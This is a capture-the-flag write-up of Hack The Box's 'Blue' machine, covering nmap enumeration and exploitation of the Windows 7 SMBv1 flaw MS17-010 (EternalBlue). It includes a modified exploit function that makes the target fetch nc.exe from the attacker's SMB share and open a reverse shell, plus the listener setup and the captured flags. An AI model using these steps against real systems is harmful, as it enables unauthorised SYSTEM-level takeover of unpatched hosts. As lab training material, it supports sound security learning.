HTB WriteUps
Blue

Last updated 2 years ago


Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and then identify the services and versions running on them.

The following nmap command scans the whole TCP port range of the target quickly and saves the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.40 -oN allPorts

  • -sS use the TCP SYN scan option. It never completes the TCP handshake, which makes it faster and slightly less intrusive than a full connect scan (it is still visible to any IDS or firewall log).

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scan the entire port range, from 1 to 65535.

  • -T5 insane timing template, the fastest nmap offers; together with --min-rate it trades accuracy for speed on a slow VPN link.

  • -Pn skip host discovery and assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result in normal format, in this case to the allPorts file.

# Nmap 7.92 scan initiated Thu Mar 24 22:03:58 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.40
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.40
Host is up (0.14s latency).
Not shown: 61407 closed tcp ports (reset), 4119 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

# Nmap done at Thu Mar 24 22:04:28 2022 -- 1 IP address (1 host up) scanned in 30.58 seconds
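Turning the allPorts file into the port list for the next scan can be scripted. The following Python is an added example written for this write-up, not code from the original page or from nmap; the sample input is the allPorts output above, embedded inline so it runs offline, and the file name ports.py in the usage comment is assumed. Besides building the second-stage command, it flags the two signs in that output that an aggressive scan may have missed ports: the retransmission-cap warning and the no-response filtered ports.

```python
"""Extract the open ports from an `nmap -oN` file, build the follow-up
`nmap -sC -sV` command and flag signs of incomplete coverage.

Added example for this write-up, not code from the original page or from
nmap.  The sample text below is the allPorts output from the write-up,
embedded so the script runs offline.
"""
import re
import sys

# Constructed sample input: the allPorts output shown in the write-up.
ALLPORTS = """\
# Nmap 7.92 scan initiated Thu Mar 24 22:03:58 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.40
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.40
Host is up (0.14s latency).
Not shown: 61407 closed tcp ports (reset), 4119 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

# Nmap done at Thu Mar 24 22:04:28 2022 -- 1 IP address (1 host up) scanned in 30.58 seconds
"""

# One "PORT/PROTO  STATE  SERVICE" row; the header line has no number, so it never matches.
PORT_ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)", re.M)
FILTERED = re.compile(r"(\d+) filtered tcp ports \(no-response\)")
RETRANS = re.compile(r"giving up on port because retransmission cap hit")


def open_ports(text, proto="tcp"):
    """Sorted list of port numbers reported as open for the given protocol."""
    return sorted({int(port) for port, p, state, _ in PORT_ROW.findall(text)
                   if p == proto and state == "open"})


def coverage_warnings(text):
    """Reasons to distrust a -T5/--min-rate scan: probes dropped on the way."""
    warnings = []
    if RETRANS.search(text):
        warnings.append("nmap hit its retransmission cap: some ports were given up on")
    m = FILTERED.search(text)
    if m and int(m.group(1)) > 0:
        warnings.append(f"{m.group(1)} ports gave no response; rescan them at a lower rate")
    return warnings


def targeted_scan_cmd(text, target, outfile="targeted"):
    """The second-stage command from the write-up, built from the first scan."""
    ports = ",".join(str(p) for p in open_ports(text))
    return f"nmap -sC -sV -p{ports} {target} -oN {outfile}"


if __name__ == "__main__":
    # Usage: python3 ports.py [allPorts] [target]; defaults to the embedded sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else ALLPORTS
    target = sys.argv[2] if len(sys.argv) > 2 else "10.10.10.40"
    for w in coverage_warnings(text):
        print("warning:", w)
    print(targeted_scan_cmd(text, target))
```

On the output above it prints both warnings followed by exactly the targeted scan command used in the next step; on a clean scan the warning list is empty.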

Now that we know which ports are open, let's find the services and versions running on them. Note the warning in the previous scan: with -T5 and --min-rate 5000 nmap gave up on some ports after hitting its retransmission cap, and 4119 ports showed as filtered (no response), so a port could have been missed; rescanning those at a lower rate is worthwhile if the open ports below turn out to be a dead end. The following command scans the open ports more in depth and saves the result into a file:

nmap -sC -sV -p135,139,445,49152,49153,49154,49155,49156,49157 10.10.10.40 -oN targeted

  • -sC performs the scan using the default set of NSE scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Mar 24 22:05:28 2022 as: nmap -sCV -p135,139,445,49152,49153,49154,49155,49156,49157 -oN targeted 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.076s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-03-24T21:17:43
|_  start_date: 2022-03-24T21:13:36
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-03-24T21:17:44+00:00
|_clock-skew: mean: 11m11s, deviation: 1s, median: 11m10s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 24 22:06:41 2022 -- 1 IP address (1 host up) scanned in 73.06 seconds

The target is running Windows 7 Professional SP1 (build 7601) and exposes SMB on port 445. The smb-security-mode script authenticated as guest, and message signing is not required, so unauthenticated SMB enumeration is possible. Let's enumerate the SMB service a bit more with nmap by running every script that belongs to both the vuln and safe categories:

nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.40

  • --script runs the NSE scripts selected by the expression; "vuln and safe" selects only scripts in both categories, so the checks are read-only and unlikely to crash the service.

  • -p scan the specified port only.

  • -oN save the scan result into a file, in this case the smbScan file.

# Nmap 7.92 scan initiated Thu Mar 24 22:22:24 2022 as: nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.054s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

# Nmap done at Thu Mar 24 22:22:28 2022 -- 1 IP address (1 host up) scanned in 4.01 seconds

The script reports the machine as vulnerable to MS17-010, the SMBv1 bug exploited by EternalBlue. The MS17-010 patch covers CVE-2017-0143 through CVE-2017-0148; the script reports the first of them.

EternalBlue allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server. The nmap script does not exploit anything: it infers the missing patch from how the server answers a malformed transaction request, so before exploiting we confirm the result with a dedicated checker. On the defensive side, the fix is the MS17-010 update, and disabling SMBv1 removes the attack surface entirely.

Exploitation

Let's clone the following GitHub repository, which contains Python scripts to check for and exploit MS17-010:

git clone https://github.com/worawit/MS17-010

First, we'll have to check that the machine is really vulnerable to EternalBlue. Edit checker.py and set the credentials to the guest account, since the nmap output showed that guest authentication is accepted:

nano MS17-010/checker.py

USERNAME = 'guest'
PASSWORD = ''

Now run it with Python 2 (the scripts in this repository are written for Python 2 and need impacket installed):

python2 MS17-010/checker.py 10.10.10.40

Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
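Picking the pipe to hand to zzz_exploit.py from the checker output can likewise be scripted. This Python is an added example for this write-up, not part of worawit's MS17-010 repository; the sample input is the checker output above embedded inline, the file name pick_pipe.py in the usage comment is assumed, and the ordering rule (a clean Ok before an Ok that carried a bind rejection, NT status errors excluded) is this example's own assumption rather than anything the checker prescribes.

```python
"""Decide from checker.py's output whether zzz_exploit.py should run, and
over which named pipe.

Added example for this write-up, not part of worawit's MS17-010 repository.
The sample text is the checker output from the write-up, embedded so the
script runs offline; the pipe preference order is this example's own
assumption.
"""
import re
import sys

# Constructed sample input: the checker.py output shown in the write-up.
CHECKER_OUTPUT = """\
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
"""

PIPE_ROW = re.compile(r"^(\w+): (.*)$")
CLEAN_OK = re.compile(r"Ok \((32|64) bit\)")


def parse_checker(text):
    """Return (target_os, patched, pipes); pipes maps pipe name -> status text."""
    m = re.search(r"^Target OS: (.*)$", text, re.M)
    target_os = m.group(1) if m else None
    patched = "The target is not patched" not in text
    pipes = {}
    in_pipes = False
    for line in text.splitlines():
        if line.startswith("=== Testing named pipes"):
            in_pipes = True
            continue
        row = PIPE_ROW.match(line) if in_pipes else None
        if row:
            pipes[row.group(1)] = row.group(2)
    return target_os, patched, pipes


def usable_pipes(pipes):
    """Pipes the checker could open, best first: a clean 'Ok (N bit)' before an
    'Ok' that carried a bind-rejection note; NT status errors are excluded."""
    clean = [name for name, status in pipes.items() if CLEAN_OK.fullmatch(status)]
    noisy = [name for name, status in pipes.items()
             if status.startswith("Ok") and name not in clean]
    return clean + noisy


def exploit_cmd(text, target):
    """argv for zzz_exploit.py as invoked in the write-up, or None if the
    checker says the host is patched or no pipe could be opened."""
    _, patched, pipes = parse_checker(text)
    candidates = usable_pipes(pipes)
    if patched or not candidates:
        return None
    return ["python2", "MS17-010/zzz_exploit.py", target, candidates[0]]


if __name__ == "__main__":
    # Usage: python2 MS17-010/checker.py 10.10.10.40 | python3 pick_pipe.py 10.10.10.40
    text = sys.stdin.read() if not sys.stdin.isatty() else CHECKER_OUTPUT
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.40"
    cmd = exploit_cmd(text, target)
    print(" ".join(cmd) if cmd else "not exploitable via a named pipe")
```

For the output above it selects samr, which is the pipe used later in the write-up; spoolss is dropped because the checker could not open it, and netlogon is kept only as a last resort because the bind on it was rejected.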

The checker confirms that the target is unpatched and that several named pipes can be opened with the guest account: samr, lsarpc and browser came back with a clean Ok, while netlogon opened but rejected the bind, and spoolss does not exist on this host. zzz_exploit.py needs one of these pipes to reach the vulnerable code, so any of the Ok ones will do. Now let's edit the zzz_exploit.py script and add the guest username again.

nano MS17-010/zzz_exploit.py

USERNAME = 'guest'
PASSWORD = ''

Now search the file for the word cmd, which takes us to the smb_pwn function, and change it so that instead of creating a test file on the target it runs a command that sends us a reverse shell:

def smb_pwn(conn, arch):
	# conn is the SMB admin session the exploit has just obtained
	smbConn = conn.get_smbconnection()
	
	# Original proof-of-exploitation stub: drop an empty file on C:\
#	print('creating file c:\\pwned.txt on the target')
#	tid2 = smbConn.connectTree('C$')
#	fid2 = smbConn.createFile(tid2, '/pwned.txt')
#	smbConn.closeFile(tid2, fid2)
#	smbConn.disconnectTree(tid2)
	
	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
	# Run nc.exe straight from our share via its UNC path. service_exec
	# creates and starts a service through the admin session, so the
	# command (and the shell it spawns) runs as NT AUTHORITY\SYSTEM.
	service_exec(conn, r'cmd /c \\10.10.14.19\smbFolder\nc.exe -e cmd 10.10.14.19 4444')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

That command makes the target run nc.exe directly from a share on our machine via its UNC path, so nothing has to be copied to the target first. Let's serve the directory containing the nc.exe binary with impacket's SMB server; the share name must match the one in the command, and -smb2support lets the server negotiate SMB2 as well as SMB1:

ls -l

-rw-r--r--  1 root    root      28160 Feb 15 19:35 nc.exe

impacket-smbserver smbFolder $(pwd) -smb2support

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Before executing the script, let's set up a netcat listener on port 4444. Wrapping it in rlwrap gives the incoming cmd.exe shell line editing and command history, which the raw connection lacks.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Finally, we run zzz_exploit.py with the target IP address and one of the pipes the checker reported as Ok (samr here). The exploit obtains an SMB admin session, creates a service that runs our command, and the target fetches nc.exe from our share and connects back to the listener. Because the service runs as NT AUTHORITY\SYSTEM, there is no separate privilege escalation step: both the user and the root flag are readable from the first shell.

python2 MS17-010/zzz_exploit.py 10.10.10.40 samr

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49163
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

whoami
nt authority\system

type \users\haris\desktop\user.txt
a221bdab893a8249c8675bbf895d78de

type \users\administrator\desktop\root.txt
c5046883c3b47ea2a7f62919ca45e59d
